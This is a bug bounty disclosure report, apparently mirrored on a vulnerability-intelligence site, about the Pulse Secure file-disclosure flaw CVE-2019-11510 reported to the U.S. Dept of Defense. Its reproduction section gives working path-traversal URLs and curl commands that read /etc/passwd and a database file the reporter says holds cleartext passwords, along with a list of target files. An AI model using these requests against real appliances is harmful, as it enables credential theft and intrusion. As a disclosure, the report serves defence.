Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog Latest Updates Security News
Sign In Sign Up

Pulse Secure File disclosure, clear text and potential RCE

Critical
U
U.S. Dept Of Defense
Submitted None
Actions:
View on HackerOne
Reported by alyssa_herrera

Vulnerability Details

Technical details and impact analysis

OS Command Injection
**Summary:** Pulse Secure has two main vulnerabilities that allow file disclosure and post auth RCE **Description:** CVE-2019-11510 is a file disclosure due to some normalization issues in pulse secure. I was able to reproduce this by grabbing in the etc/passswd. https://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/# Though the impact of that is very limited, medium to high sec at best. From here we can grab a specific file. The file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear context passwords and usernames, when a user logs in from here we can then access the Pulse secure instance. I stopped here due to not wanting to break the rules of engagements but from here I would log in then exploit a Post auth exploit. Here's a list of files that an attacker would instantly hit /data/runtime/mtmp/system /data/runtime/mtmp/lmdb/dataa/data.mdb /data/runtime/mtmp/lmdb/dataa/lock.mdb /data/runtime/mtmp/lmdb/randomVal/data.mdb /data/runtime/mtmp/lmdb/randomVal/lock.mdb ## Impact Critical ## Step-by-step Reproduction Instructions We can only do this using due to browsers messing up the exploit curl --path-as-is -k -D- https://████████/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/# curl --path-as-is -k -D- https://████████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/# curl --path-as-is -k -D- https://███/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/# ## Product, Version, and Configuration (If applicable) Pulse Secure ## Suggested Mitigation/Remediation Actions Patch pulse immediately ## Impact An attacker will be able to download internal files and specifically target a local file which stores clear text passwords when a user login. This also an attacker to access highly sensitive internal areas and even can perform command execution

Related CVEs

Associated Common Vulnerabilities and Exposures

CVE-2019-11510 CRITICAL

In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

OS Command Injection